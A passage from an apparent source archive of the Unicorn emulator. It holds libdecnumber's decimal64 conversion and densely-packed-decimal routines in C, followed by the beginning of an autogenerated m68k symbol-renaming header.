status|=DEC_Clamped; } /* fastpath common case */ if (DECDPUN==3 && pad==0) { uInt dpd[6]={0,0,0,0,0,0}; uInt i; Int d=dn->digits; for (i=0; d>0; i++, d-=3) dpd[i]=BIN2DPD[dn->lsu[i]]; targlo =dpd[0]; targlo|=dpd[1]<<10; targlo|=dpd[2]<<20; if (dn->digits>6) { targlo|=dpd[3]<<30; targhi =dpd[3]>>2; targhi|=dpd[4]<<8; } msd=dpd[5]; /* [did not really need conversion] */ } else { /* general case */ decDigitsToDPD(dn, targar, pad); /* save and clear the top digit */ msd=targhi>>18; targhi&=0x0003ffff; } /* create the combination field */ if (msd>=8) comb=0x18 | ((exp>>7) & 0x06) | (msd & 0x01); else comb=((exp>>5) & 0x18) | msd; } targhi|=comb<<26; /* add combination field .. */ targhi|=(exp&0xff)<<18; /* .. and exponent continuation */ } /* finite */ if (dn->bits&DECNEG) targhi|=0x80000000; /* add sign bit */ /* now write to storage; this is now always endian */ pu=(uInt *)d64->bytes; /* overlay */ if (DECLITEND) { pu[0]=targar[0]; /* directly store the low int */ pu[1]=targar[1]; /* then the high int */ } else { pu[0]=targar[1]; /* directly store the high int */ pu[1]=targar[0]; /* then the low int */ } if (status!=0) decContextSetStatus(set, status); /* pass on status */ /* decimal64Show(d64); */ return d64; } /* decimal64FromNumber */ /* ------------------------------------------------------------------ */ /* decimal64ToNumber -- convert decimal64 to decNumber */ /* d64 is the source decimal64 */ /* dn is the target number, with appropriate space */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decimal64ToNumber(const decimal64 *d64, decNumber *dn) { uInt msd; /* coefficient MSD */ uInt exp; /* exponent top two bits */ uInt comb; /* combination field */ const uInt *pu; /* work */ Int need; /* .. */ uInt sourar[2]; /* source 64-bit */ #define sourhi sourar[1] /* name the word with the sign */ #define sourlo sourar[0] /* and the lower word */ /* load source from storage; this is endian */ pu=(const uInt *)d64->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourhi=pu[1]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourlo=pu[1]; /* then the low int */ } comb=(sourhi>>26)&0x1f; /* combination field */ decNumberZero(dn); /* clean number */ if (sourhi&0x80000000) dn->bits=DECNEG; /* set sign if negative */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { /* is a special */ if (msd==0) { dn->bits|=DECINF; return dn; /* no coefficient needed */ } else if (sourhi&0x02000000) dn->bits|=DECSNAN; else dn->bits|=DECNAN; msd=0; /* no top digit */ } else { /* is a finite number */ dn->exponent=(exp<<8)+((sourhi>>18)&0xff)-DECIMAL64_Bias; /* unbiased */ } /* get the coefficient */ sourhi&=0x0003ffff; /* clean coefficient continuation */ if (msd) { /* non-zero msd */ sourhi|=msd<<18; /* prefix to coefficient */ need=6; /* process 6 declets */ } else { /* msd=0 */ if (!sourhi) { /* top word 0 */ if (!sourlo) return dn; /* easy: coefficient is 0 */ need=3; /* process at least 3 declets */ if (sourlo&0xc0000000) need++; /* process 4 declets */ /* [could reduce some more, here] */ } else { /* some bits in top word, msd=0 */ need=4; /* process at least 4 declets */ if (sourhi&0x0003ff00) need++; /* top declet!=0, process 5 */ } } /*msd=0 */ decDigitsFromDPD(dn, sourar, need); /* process declets */ return dn; } /* decimal64ToNumber */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decimal64ToString(d64, string); */ /* decimal64ToEngString(d64, string); */ /* */ /* d64 is the decimal64 format number to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least 24 characters */ /* */ /* No error is possible, and no status can be set. */ /* ------------------------------------------------------------------ */ char * decimal64ToEngString(const decimal64 *d64, char *string){ decNumber dn; /* work */ decimal64ToNumber(d64, &dn); decNumberToEngString(&dn, string); return string; } /* decimal64ToEngString */ char * decimal64ToString(const decimal64 *d64, char *string){ uInt msd; /* coefficient MSD */ Int exp; /* exponent top two bits or full */ uInt comb; /* combination field */ char *cstart; /* coefficient start */ char *c; /* output pointer in string */ const uInt *pu; /* work */ char *s, *t; /* .. (source, target) */ Int dpd; /* .. */ Int pre, e; /* .. */ const uByte *u; /* .. */ uInt sourar[2]; /* source 64-bit */ #define sourhi sourar[1] /* name the word with the sign */ #define sourlo sourar[0] /* and the lower word */ /* load source from storage; this is endian */ pu=(const uInt *)d64->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourhi=pu[1]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourlo=pu[1]; /* then the low int */ } c=string; /* where result will go */ if (((Int)sourhi)<0) *c++='-'; /* handle sign */ comb=(sourhi>>26)&0x1f; /* combination field */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { if (msd==0) { /* infinity */ strcpy(c, "Inf"); strcpy(c+3, "inity"); return string; /* easy */ } if (sourhi&0x02000000) *c++='s'; /* sNaN */ strcpy(c, "NaN"); /* complete word */ c+=3; /* step past */ if (sourlo==0 && (sourhi&0x0003ffff)==0) return string; /* zero payload */ /* otherwise drop through to add integer; set correct exp */ exp=0; msd=0; /* setup for following code */ } else exp=(exp<<8)+((sourhi>>18)&0xff)-DECIMAL64_Bias; /* convert 16 digits of significand to characters */ cstart=c; /* save start of coefficient */ if (msd) *c++='0'+(char)msd; /* non-zero most significant digit */ /* Now decode the declets. After extracting each one, it is */ /* decoded to binary and then to a 4-char sequence by table lookup; */ /* the 4-chars are a 1-char length (significant digits, except 000 */ /* has length 0). This allows us to left-align the first declet */ /* with non-zero content, then remaining ones are full 3-char */ /* length. We use fixed-length memcpys because variable-length */ /* causes a subroutine call in GCC. (These are length 4 for speed */ /* and are safe because the array has an extra terminator byte.) */ #define dpd2char u=&BIN2CHAR[DPD2BIN[dpd]*4]; \ if (c!=cstart) {memcpy(c, u+1, 4); c+=3;} \ else if (*u) {memcpy(c, u+4-*u, 4); c+=*u;} dpd=(sourhi>>8)&0x3ff; /* declet 1 */ dpd2char; dpd=((sourhi&0xff)<<2) | (sourlo>>30); /* declet 2 */ dpd2char; dpd=(sourlo>>20)&0x3ff; /* declet 3 */ dpd2char; dpd=(sourlo>>10)&0x3ff; /* declet 4 */ dpd2char; dpd=(sourlo)&0x3ff; /* declet 5 */ dpd2char; if (c==cstart) *c++='0'; /* all zeros -- make 0 */ if (exp==0) { /* integer or NaN case -- easy */ *c='\0'; /* terminate */ return string; } /* non-0 exponent */ e=0; /* assume no E */ pre=c-cstart+exp; /* [here, pre-exp is the digits count (==1 for zero)] */ if (exp>0 || pre<-5) { /* need exponential form */ e=pre-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ } /* exponential form */ /* modify the coefficient, adding 0s, '.', and E+nn as needed */ s=c-1; /* source (LSD) */ if (pre>0) { /* ddd.ddd (plain), perhaps with E */ char *dotat=cstart+pre; if (dotat<c) { /* if embedded dot needed... */ t=c; /* target */ for (; s>=dotat; s--, t--) *t=*s; /* open the gap; leave t at gap */ *t='.'; /* insert the dot */ c++; /* length increased by one */ } /* finally add the E-part, if needed; it will never be 0, and has */ /* a maximum length of 3 digits */ if (e!=0) { *c++='E'; /* starts with E */ *c++='+'; /* assume positive */ if (e<0) { *(c-1)='-'; /* oops, need '-' */ e=-e; /* uInt, please */ } u=&BIN2CHAR[e*4]; /* -> length byte */ memcpy(c, u+4-*u, 4); /* copy fixed 4 characters [is safe] */ c+=*u; /* bump pointer appropriately */ } *c='\0'; /* add terminator */ /*printf("res %s\n", string); */ return string; } /* pre>0 */ /* -5<=pre<=0: here for plain 0.ddd or 0.000ddd forms (can never have E) */ t=c+1-pre; *(t+1)='\0'; /* can add terminator now */ for (; s>=cstart; s--, t--) *t=*s; /* shift whole coefficient right */ c=cstart; *c++='0'; /* always starts with 0. */ *c++='.'; for (; pre<0; pre++) *c++='0'; /* add any 0's after '.' */ /*printf("res %s\n", string); */ return string; } /* decimal64ToString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decimal64FromString(result, string, set); */ /* */ /* result is the decimal64 format number which gets the result of */ /* the conversion */ /* *string is the character string which should contain a valid */ /* number (which may be a special value) */ /* set is the context */ /* */ /* The context is supplied to this routine is used for error handling */ /* (setting of status and traps) and for the rounding mode, only. */ /* If an error occurs, the result will be a valid decimal64 NaN. */ /* ------------------------------------------------------------------ */ decimal64 * decimal64FromString(decimal64 *result, const char *string, decContext *set) { decContext dc; /* work */ decNumber dn; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL64); /* no traps, please */ dc.round=set->round; /* use supplied rounding */ decNumberFromString(&dn, string, &dc); /* will round if needed */ decimal64FromNumber(result, &dn, &dc); if (dc.status!=0) { /* something happened */ decContextSetStatus(set, dc.status); /* .. pass it on */ } return result; } /* decimal64FromString */ /* ------------------------------------------------------------------ */ /* decimal64IsCanonical -- test whether encoding is canonical */ /* d64 is the source decimal64 */ /* returns 1 if the encoding of d64 is canonical, 0 otherwise */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uint32_t decimal64IsCanonical(const decimal64 *d64) { decNumber dn; /* work */ decimal64 canon; /* .. */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL64); decimal64ToNumber(d64, &dn); decimal64FromNumber(&canon, &dn, &dc);/* canon will now be canonical */ return memcmp(d64, &canon, DECIMAL64_Bytes)==0; } /* decimal64IsCanonical */ /* ------------------------------------------------------------------ */ /* decimal64Canonical -- copy an encoding, ensuring it is canonical */ /* d64 is the source decimal64 */ /* result is the target (may be the same decimal64) */ /* returns result */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decimal64 * decimal64Canonical(decimal64 *result, const decimal64 *d64) { decNumber dn; /* work */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL64); decimal64ToNumber(d64, &dn); decimal64FromNumber(result, &dn, &dc);/* result will now be canonical */ return result; } /* decimal64Canonical */ #if DECTRACE || DECCHECK /* Macros for accessing decimal64 fields. These assume the argument is a reference (pointer) to the decimal64 structure, and the decimal64 is in network byte order (big-endian) */ /* Get sign */ #define decimal64Sign(d) ((unsigned)(d)->bytes[0]>>7) /* Get combination field */ #define decimal64Comb(d) (((d)->bytes[0] & 0x7c)>>2) /* Get exponent continuation [does not remove bias] */ #define decimal64ExpCon(d) ((((d)->bytes[0] & 0x03)<<6) \ | ((unsigned)(d)->bytes[1]>>2)) /* Set sign [this assumes sign previously 0] */ #define decimal64SetSign(d, b) { \ (d)->bytes[0]|=((unsigned)(b)<<7);} /* Set exponent continuation [does not apply bias] */ /* This assumes range has been checked and exponent previously 0; */ /* type of exponent must be unsigned */ #define decimal64SetExpCon(d, e) { \ (d)->bytes[0]|=(uint8_t)((e)>>6); \ (d)->bytes[1]|=(uint8_t)(((e)&0x3F)<<2);} /* ------------------------------------------------------------------ */ /* decimal64Show -- display a decimal64 in hexadecimal [debug aid] */ /* d64 -- the number to show */ /* ------------------------------------------------------------------ */ /* Also shows sign/cob/expconfields extracted */ void decimal64Show(const decimal64 *d64) { char buf[DECIMAL64_Bytes*2+1]; Int i, j=0; if (DECLITEND) { for (i=0; i<DECIMAL64_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d64->bytes[7-i]); } printf(" D64> %s [S:%d Cb:%02x Ec:%02x] LittleEndian\n", buf, d64->bytes[7]>>7, (d64->bytes[7]>>2)&0x1f, ((d64->bytes[7]&0x3)<<6)| (d64->bytes[6]>>2)); } else { /* big-endian */ for (i=0; i<DECIMAL64_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d64->bytes[i]); } printf(" D64> %s [S:%d Cb:%02x Ec:%02x] BigEndian\n", buf, decimal64Sign(d64), decimal64Comb(d64), decimal64ExpCon(d64)); } } /* decimal64Show */ #endif /* ================================================================== */ /* Shared utility routines and tables */ /* ================================================================== */ /* define and include the conversion tables to use for shared code */ #if DECDPUN==3 #define DEC_DPD2BIN 1 #else #define DEC_DPD2BCD 1 #endif #include "libdecnumber/decDPD.h" /* The maximum number of decNumberUnits needed for a working copy of */ /* the units array is the ceiling of digits/DECDPUN, where digits is */ /* the maximum number of digits in any of the formats for which this */ /* is used. decimal128.h must not be included in this module, so, as */ /* a very special case, that number is defined as a literal here. */ #define DECMAX754 34 #define DECMAXUNITS ((DECMAX754+DECDPUN-1)/DECDPUN) /* ------------------------------------------------------------------ */ /* Combination field lookup tables (uInts to save measurable work) */ /* */ /* COMBEXP - 2-bit most-significant-bits of exponent */ /* [11 if an Infinity or NaN] */ /* COMBMSD - 4-bit most-significant-digit */ /* [0=Infinity, 1=NaN if COMBEXP=11] */ /* */ /* Both are indexed by the 5-bit combination field (0-31) */ /* ------------------------------------------------------------------ */ const uInt COMBEXP[32]={0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 0, 1, 1, 2, 2, 3, 3}; const uInt COMBMSD[32]={0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 9, 8, 9, 0, 1}; /* ------------------------------------------------------------------ */ /* decDigitsToDPD -- pack coefficient into DPD form */ /* */ /* dn is the source number (assumed valid, max DECMAX754 digits) */ /* targ is 1, 2, or 4-element uInt array, which the caller must */ /* have cleared to zeros */ /* shift is the number of 0 digits to add on the right (normally 0) */ /* */ /* The coefficient must be known small enough to fit. The full */ /* coefficient is copied, including the leading 'odd' digit. This */ /* digit is retrieved and packed into the combination field by the */ /* caller. */ /* */ /* The target uInts are altered only as necessary to receive the */ /* digits of the decNumber. When more than one uInt is needed, they */ /* are filled from left to right (that is, the uInt at offset 0 will */ /* end up with the least-significant digits). */ /* */ /* shift is used for 'fold-down' padding. */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ #if DECDPUN<=4 /* Constant multipliers for divide-by-power-of five using reciprocal */ /* multiply, after removing powers of 2 by shifting, and final shift */ /* of 17 [we only need up to **4] */ static const uInt multies[]={131073, 26215, 5243, 1049, 210}; /* QUOT10 -- macro to return the quotient of unit u divided by 10**n */ #define QUOT10(u, n) ((((uInt)(u)>>(n))*multies[n])>>17) #endif void decDigitsToDPD(const decNumber *dn, uInt *targ, Int shift) { Int cut; /* work */ Int n; /* output bunch counter */ Int digits=dn->digits; /* digit countdown */ uInt dpd; /* densely packed decimal value */ uInt bin; /* binary value 0-999 */ uInt *uout=targ; /* -> current output uInt */ uInt uoff=0; /* -> current output offset [from right] */ const Unit *inu=dn->lsu; /* -> current input unit */ Unit uar[DECMAXUNITS]; /* working copy of units, iff shifted */ #if DECDPUN!=3 /* not fast path */ Unit in; /* current unit */ #endif if (shift!=0) { /* shift towards most significant required */ /* shift the units array to the left by pad digits and copy */ /* [this code is a special case of decShiftToMost, which could */ /* be used instead if exposed and the array were copied first] */ const Unit *source; /* .. */ Unit *target, *first; /* .. */ uInt next=0; /* work */ source=dn->lsu+D2U(digits)-1; /* where msu comes from */ target=uar+D2U(digits)-1+D2U(shift);/* where upper part of first cut goes */ cut=DECDPUN-MSUDIGITS(shift); /* where to slice */ if (cut==0) { /* unit-boundary case */ for (; source>=dn->lsu; source--, target--) *target=*source; } else { first=uar+D2U(digits+shift)-1; /* where msu will end up */ for (; source>=dn->lsu; source--, target--) { /* split the source Unit and accumulate remainder for next */ #if DECDPUN<=4 uInt quot=QUOT10(*source, cut); uInt rem=*source-quot*DECPOWERS[cut]; next+=quot; #else uInt rem=*source%DECPOWERS[cut]; next+=*source/DECPOWERS[cut]; #endif if (target<=first) *target=(Unit)next; /* write to target iff valid */ next=rem*DECPOWERS[DECDPUN-cut]; /* save remainder for next Unit */ } } /* shift-move */ /* propagate remainder to one below and clear the rest */ for (; target>=uar; target--) { *target=(Unit)next; next=0; } digits+=shift; /* add count (shift) of zeros added */ inu=uar; /* use units in working array */ } /* now densely pack the coefficient into DPD declets */ #if DECDPUN!=3 /* not fast path */ in=*inu; /* current unit */ cut=0; /* at lowest digit */ bin=0; /* [keep compiler quiet] */ #endif for(n=0; digits>0; n++) { /* each output bunch */ #if DECDPUN==3 /* fast path, 3-at-a-time */ bin=*inu; /* 3 digits ready for convert */ digits-=3; /* [may go negative] */ inu++; /* may need another */ #else /* must collect digit-by-digit */ Unit dig; /* current digit */ Int j; /* digit-in-declet count */ for (j=0; j<3; j++) { #if DECDPUN<=4 Unit temp=(Unit)((uInt)(in*6554)>>16); dig=(Unit)(in-X10(temp)); in=temp; #else dig=in%10; in=in/10; #endif if (j==0) bin=dig; else if (j==1) bin+=X10(dig); else /* j==2 */ bin+=X100(dig); digits--; if (digits==0) break; /* [also protects *inu below] */ cut++; if (cut==DECDPUN) {inu++; in=*inu; cut=0;} } #endif /* here there are 3 digits in bin, or have used all input digits */ dpd=BIN2DPD[bin]; /* write declet to uInt array */ *uout|=dpd<<uoff; uoff+=10; if (uoff<32) continue; /* no uInt boundary cross */ uout++; uoff-=32; *uout|=dpd>>(10-uoff); /* collect top bits */ } /* n declets */ return; } /* decDigitsToDPD */ /* ------------------------------------------------------------------ */ /* decDigitsFromDPD -- unpack a format's coefficient */ /* */ /* dn is the target number, with 7, 16, or 34-digit space. */ /* sour is a 1, 2, or 4-element uInt array containing only declets */ /* declets is the number of (right-aligned) declets in sour to */ /* be processed. This may be 1 more than the obvious number in */ /* a format, as any top digit is prefixed to the coefficient */ /* continuation field. It also may be as small as 1, as the */ /* caller may pre-process leading zero declets. */ /* */ /* When doing the 'extra declet' case care is taken to avoid writing */ /* extra digits when there are leading zeros, as these could overflow */ /* the units array when DECDPUN is not 3. */ /* */ /* The target uInts are used only as necessary to process declets */ /* declets into the decNumber. When more than one uInt is needed, */ /* they are used from left to right (that is, the uInt at offset 0 */ /* provides the least-significant digits). */ /* */ /* dn->digits is set, but not the sign or exponent. */ /* No error is possible [the redundant 888 codes are allowed]. */ /* ------------------------------------------------------------------ */ void decDigitsFromDPD(decNumber *dn, const uInt *sour, Int declets) { uInt dpd; /* collector for 10 bits */ Int n; /* counter */ Unit *uout=dn->lsu; /* -> current output unit */ Unit *last=uout; /* will be unit containing msd */ const uInt *uin=sour; /* -> current input uInt */ uInt uoff=0; /* -> current input offset [from right] */ #if DECDPUN!=3 uInt bcd; /* BCD result */ uInt nibble; /* work */ Unit out=0; /* accumulator */ Int cut=0; /* power of ten in current unit */ #endif #if DECDPUN>4 uInt const *pow; /* work */ #endif /* Expand the densely-packed integer, right to left */ for (n=declets-1; n>=0; n--) { /* count down declets of 10 bits */ dpd=*uin>>uoff; uoff+=10; if (uoff>32) { /* crossed uInt boundary */ uin++; uoff-=32; dpd|=*uin<<(10-uoff); /* get waiting bits */ } dpd&=0x3ff; /* clear uninteresting bits */ #if DECDPUN==3 if (dpd==0) *uout=0; else { *uout=DPD2BIN[dpd]; /* convert 10 bits to binary 0-999 */ last=uout; /* record most significant unit */ } uout++; } /* n */ #else /* DECDPUN!=3 */ if (dpd==0) { /* fastpath [e.g., leading zeros] */ /* write out three 0 digits (nibbles); out may have digit(s) */ cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} if (n==0) break; /* [as below, works even if MSD=0] */ cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} continue; } bcd=DPD2BCD[dpd]; /* convert 10 bits to 12 bits BCD */ /* now accumulate the 3 BCD nibbles into units */ nibble=bcd & 0x00f; if (nibble) out=(Unit)(out+nibble*DECPOWERS[cut]); cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} bcd>>=4; /* if this is the last declet and the remaining nibbles in bcd */ /* are 00 then process no more nibbles, because this could be */ /* the 'odd' MSD declet and writing any more Units would then */ /* overflow the unit array */ if (n==0 && !bcd) break; nibble=bcd & 0x00f; if (nibble) out=(Unit)(out+nibble*DECPOWERS[cut]); cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} bcd>>=4; nibble=bcd & 0x00f; if (nibble) out=(Unit)(out+nibble*DECPOWERS[cut]); cut++; if (cut==DECDPUN) {*uout=out; if (out) {last=uout; out=0;} uout++; cut=0;} } /* n */ if (cut!=0) { /* some more left over */ *uout=out; /* write out final unit */ if (out) last=uout; /* and note if non-zero */ } #endif /* here, last points to the most significant unit with digits; */ /* inspect it to get the final digits count -- this is essentially */ /* the same code as decGetDigits in decNumber.c */ dn->digits=(last-dn->lsu)*DECDPUN+1; /* floor of digits, plus */ /* must be at least 1 digit */ #if DECDPUN>1 if (*last<10) return; /* common odd digit or 0 */ dn->digits++; /* must be 2 at least */ #if DECDPUN>2 if (*last<100) return; /* 10-99 */ dn->digits++; /* must be 3 at least */ #if DECDPUN>3 if (*last<1000) return; /* 100-999 */ dn->digits++; /* must be 4 at least */ #if DECDPUN>4 for (pow=&DECPOWERS[4]; *last>=*pow; pow++) dn->digits++; #endif #endif #endif #endif return; } /*decDigitsFromDPD */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/m68k.h���������������������������������������������������������������������������0000664�0000000�0000000�00000230504�14675241067�0015115�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_m68k_H #define UNICORN_AUTOGEN_m68k_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _m68k #endif #define unicorn_fill_tlb unicorn_fill_tlb_m68k #define reg_read reg_read_m68k #define reg_write reg_write_m68k #define uc_init uc_init_m68k #define uc_add_inline_hook uc_add_inline_hook_m68k #define uc_del_inline_hook uc_del_inline_hook_m68k #define tb_invalidate_phys_range tb_invalidate_phys_range_m68k #define use_idiv_instructions use_idiv_instructions_m68k #define arm_arch arm_arch_m68k #define tb_target_set_jmp_target tb_target_set_jmp_target_m68k #define have_bmi1 have_bmi1_m68k #define have_popcnt have_popcnt_m68k #define have_avx1 have_avx1_m68k #define have_avx2 have_avx2_m68k #define have_isa have_isa_m68k #define have_altivec have_altivec_m68k #define have_vsx have_vsx_m68k #define flush_icache_range flush_icache_range_m68k #define s390_facilities s390_facilities_m68k #define tcg_dump_op tcg_dump_op_m68k #define tcg_dump_ops tcg_dump_ops_m68k #define tcg_gen_and_i64 tcg_gen_and_i64_m68k #define tcg_gen_discard_i64 tcg_gen_discard_i64_m68k #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_m68k #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_m68k #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_m68k #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_m68k #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_m68k #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_m68k #define tcg_gen_ld_i64 tcg_gen_ld_i64_m68k #define tcg_gen_mov_i64 tcg_gen_mov_i64_m68k #define tcg_gen_movi_i64 tcg_gen_movi_i64_m68k #define tcg_gen_mul_i64 tcg_gen_mul_i64_m68k #define tcg_gen_or_i64 tcg_gen_or_i64_m68k #define tcg_gen_sar_i64 tcg_gen_sar_i64_m68k #define tcg_gen_shl_i64 tcg_gen_shl_i64_m68k #define tcg_gen_shr_i64 tcg_gen_shr_i64_m68k #define tcg_gen_st_i64 tcg_gen_st_i64_m68k #define tcg_gen_xor_i64 tcg_gen_xor_i64_m68k #define cpu_icount_to_ns cpu_icount_to_ns_m68k #define cpu_is_stopped cpu_is_stopped_m68k #define cpu_get_ticks cpu_get_ticks_m68k #define cpu_get_clock cpu_get_clock_m68k #define cpu_resume cpu_resume_m68k #define qemu_init_vcpu qemu_init_vcpu_m68k #define cpu_stop_current cpu_stop_current_m68k #define resume_all_vcpus resume_all_vcpus_m68k #define vm_start vm_start_m68k #define address_space_dispatch_compact address_space_dispatch_compact_m68k #define flatview_translate flatview_translate_m68k #define address_space_translate_for_iotlb address_space_translate_for_iotlb_m68k #define qemu_get_cpu qemu_get_cpu_m68k #define cpu_address_space_init cpu_address_space_init_m68k #define cpu_get_address_space cpu_get_address_space_m68k #define cpu_exec_unrealizefn cpu_exec_unrealizefn_m68k #define cpu_exec_initfn cpu_exec_initfn_m68k #define cpu_exec_realizefn cpu_exec_realizefn_m68k #define tb_invalidate_phys_addr tb_invalidate_phys_addr_m68k #define cpu_watchpoint_insert cpu_watchpoint_insert_m68k #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_m68k #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_m68k #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_m68k #define cpu_breakpoint_insert cpu_breakpoint_insert_m68k #define cpu_breakpoint_remove cpu_breakpoint_remove_m68k #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_m68k #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_m68k #define cpu_abort cpu_abort_m68k #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_m68k #define memory_region_section_get_iotlb memory_region_section_get_iotlb_m68k #define flatview_add_to_dispatch flatview_add_to_dispatch_m68k #define qemu_ram_get_host_addr qemu_ram_get_host_addr_m68k #define qemu_ram_get_offset qemu_ram_get_offset_m68k #define qemu_ram_get_used_length qemu_ram_get_used_length_m68k #define qemu_ram_is_shared qemu_ram_is_shared_m68k #define qemu_ram_pagesize qemu_ram_pagesize_m68k #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_m68k #define qemu_ram_alloc qemu_ram_alloc_m68k #define qemu_ram_free qemu_ram_free_m68k #define qemu_map_ram_ptr qemu_map_ram_ptr_m68k #define qemu_ram_block_host_offset qemu_ram_block_host_offset_m68k #define qemu_ram_block_from_host qemu_ram_block_from_host_m68k #define qemu_ram_addr_from_host qemu_ram_addr_from_host_m68k #define cpu_check_watchpoint cpu_check_watchpoint_m68k #define iotlb_to_section iotlb_to_section_m68k #define address_space_dispatch_new address_space_dispatch_new_m68k #define address_space_dispatch_free address_space_dispatch_free_m68k #define flatview_read_continue flatview_read_continue_m68k #define address_space_read_full address_space_read_full_m68k #define address_space_write address_space_write_m68k #define address_space_rw address_space_rw_m68k #define cpu_physical_memory_rw cpu_physical_memory_rw_m68k #define address_space_write_rom address_space_write_rom_m68k #define cpu_flush_icache_range cpu_flush_icache_range_m68k #define cpu_exec_init_all cpu_exec_init_all_m68k #define address_space_access_valid address_space_access_valid_m68k #define address_space_map address_space_map_m68k #define address_space_unmap address_space_unmap_m68k #define cpu_physical_memory_map cpu_physical_memory_map_m68k #define cpu_physical_memory_unmap cpu_physical_memory_unmap_m68k #define cpu_memory_rw_debug cpu_memory_rw_debug_m68k #define qemu_target_page_size qemu_target_page_size_m68k #define qemu_target_page_bits qemu_target_page_bits_m68k #define qemu_target_page_bits_min qemu_target_page_bits_min_m68k #define target_words_bigendian target_words_bigendian_m68k #define cpu_physical_memory_is_io cpu_physical_memory_is_io_m68k #define ram_block_discard_range ram_block_discard_range_m68k #define ramblock_is_pmem ramblock_is_pmem_m68k #define page_size_init page_size_init_m68k #define set_preferred_target_page_bits set_preferred_target_page_bits_m68k #define finalize_target_page_bits finalize_target_page_bits_m68k #define cpu_outb cpu_outb_m68k #define cpu_outw cpu_outw_m68k #define cpu_outl cpu_outl_m68k #define cpu_inb cpu_inb_m68k #define cpu_inw cpu_inw_m68k #define cpu_inl cpu_inl_m68k #define memory_map memory_map_m68k #define memory_map_io memory_map_io_m68k #define memory_map_ptr memory_map_ptr_m68k #define memory_cow memory_cow_m68k #define memory_unmap memory_unmap_m68k #define memory_moveout memory_moveout_m68k #define memory_movein memory_movein_m68k #define memory_free memory_free_m68k #define flatview_unref flatview_unref_m68k #define address_space_get_flatview address_space_get_flatview_m68k #define memory_region_transaction_begin memory_region_transaction_begin_m68k #define memory_region_transaction_commit memory_region_transaction_commit_m68k #define memory_region_init memory_region_init_m68k #define memory_region_access_valid memory_region_access_valid_m68k #define memory_region_dispatch_read memory_region_dispatch_read_m68k #define memory_region_dispatch_write memory_region_dispatch_write_m68k #define memory_region_init_io memory_region_init_io_m68k #define memory_region_init_ram_ptr memory_region_init_ram_ptr_m68k #define memory_region_size memory_region_size_m68k #define memory_region_set_readonly memory_region_set_readonly_m68k #define memory_region_get_ram_ptr memory_region_get_ram_ptr_m68k #define memory_region_from_host memory_region_from_host_m68k #define memory_region_get_ram_addr memory_region_get_ram_addr_m68k #define memory_region_add_subregion memory_region_add_subregion_m68k #define memory_region_del_subregion memory_region_del_subregion_m68k #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_m68k #define memory_region_find memory_region_find_m68k #define memory_region_filter_subregions memory_region_filter_subregions_m68k #define memory_listener_register memory_listener_register_m68k #define memory_listener_unregister memory_listener_unregister_m68k #define address_space_remove_listeners address_space_remove_listeners_m68k #define address_space_init address_space_init_m68k #define address_space_destroy address_space_destroy_m68k #define memory_region_init_ram memory_region_init_ram_m68k #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_m68k #define find_memory_mapping find_memory_mapping_m68k #define exec_inline_op exec_inline_op_m68k #define floatx80_default_nan floatx80_default_nan_m68k #define float_raise float_raise_m68k #define float16_is_quiet_nan float16_is_quiet_nan_m68k #define float16_is_signaling_nan float16_is_signaling_nan_m68k #define float32_is_quiet_nan float32_is_quiet_nan_m68k #define 